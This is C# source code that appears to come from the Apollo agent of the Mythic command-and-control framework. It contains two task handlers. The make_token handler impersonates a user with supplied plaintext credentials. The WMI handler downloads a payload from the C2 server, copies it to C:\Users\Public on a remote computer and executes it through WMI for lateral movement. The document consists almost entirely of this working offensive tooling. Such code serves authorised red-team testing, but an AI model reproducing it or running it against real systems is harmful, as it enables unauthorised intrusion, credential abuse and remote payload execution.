/// <summary> /// Create a token based on the task.@params passed. /// </summary> /// <param name="task">Task that holds a Cred JSON dict with the proper values to spawn the process.</param> public static void MakeToken(Job j) { var task = j.Task; MakeTokenParameter parameters = JsonConvert.DeserializeObject <MakeTokenParameter>(task.parameters); MythicCredential cred = parameters.credential; if (string.IsNullOrEmpty(cred.account) || string.IsNullOrEmpty(cred.credential)) { j.SetError("Username and password are required for make_token."); return; } if (cred.credential_type != "plaintext") { j.SetError($"make_token can only be used with plaintext credentials, and was given credentials of type {cred.credential_type}"); return; } string userFQDN = cred.account; if (!string.IsNullOrEmpty(cred.realm)) { userFQDN = cred.realm + "\\" + userFQDN; } else { userFQDN = ".\\" + userFQDN; } if (!CredentialManager.SetCredential(cred.account, cred.credential, cred.realm)) { j.SetError($"Failed to make_token with {userFQDN}:{cred.credential}\n\t:Error Code: {Marshal.GetLastWin32Error()}"); return; } try { string msg = $"Successfully impersonated {CredentialManager.GetCurrentUsername()}"; ApolloTaskResponse resp = new ApolloTaskResponse(task, msg) { artifacts = new Artifact[] { new Artifact("Logon Event", $"New Type 9 Logon for {CredentialManager.GetCurrentUsername()}") } }; j.SetComplete(resp); } catch (Exception ex) { j.SetError($"Unknown error: {ex.Message}\nStackTrace{ex.StackTrace}"); } }
public static void Execute(Job job, Agent agent) { WMIProcessExecuteParameters parameters = (WMIProcessExecuteParameters)JsonConvert.DeserializeObject <WMIProcessExecuteParameters>(job.Task.parameters); ApolloTaskResponse resp; MythicCredential cred = new MythicCredential(); bool success; byte[] templateFile; string username = null; string password = null; string formattedRemotePath = null; string fileGuid = Guid.NewGuid().ToString(); if (string.IsNullOrEmpty(parameters.computer)) { job.SetError("No computer name passed."); return; } if (string.IsNullOrEmpty(parameters.template)) { job.SetError("No template was given to download."); return; } if (!string.IsNullOrEmpty(parameters.credential)) { cred = JsonConvert.DeserializeObject <MythicCredential>(parameters.credential); } string remotePath = parameters.remote_path; if (string.IsNullOrEmpty(parameters.remote_path)) { formattedRemotePath = $"\\\\{parameters.computer}\\C$\\Users\\Public\\{fileGuid}.exe"; remotePath = $"C:\\Users\\Public\\{fileGuid}.exe"; } else { if (Directory.Exists(parameters.remote_path)) { parameters.remote_path = Path.Combine(parameters.remote_path, $"{fileGuid}.exe"); } remotePath = parameters.remote_path; //formattedRemotePath = $"\\\\{parameters.computer}\\{parameters.remote_path.Replace(':', '$')}"; } try { templateFile = agent.Profile.GetFile(job.Task.id, parameters.template, agent.Profile.ChunkSize); } catch (Exception ex) { job.SetError($"Error fetching remote file: {ex.Message}"); return; } if (templateFile == null || templateFile.Length == 0) { job.SetError($"File ID {parameters.template} was of zero length."); return; } try { File.WriteAllBytes(remotePath, templateFile); resp = new ApolloTaskResponse(job.Task, $"Copied payload to {remotePath}"); job.AddOutput(resp); } catch (Exception ex) { job.SetError($"Remote file copy to {remotePath} failed. Reason: {ex.Message}"); return; } if (!string.IsNullOrEmpty(cred.account)) { username = cred.account; if (!string.IsNullOrEmpty(cred.realm)) { username = cred.realm + "\\" + username; } password = cred.credential; } success = WMIUtils.RemoteWMIExecute(parameters.computer, remotePath, out string[] results, username, password); job.SetComplete(string.Join("\n", results)); }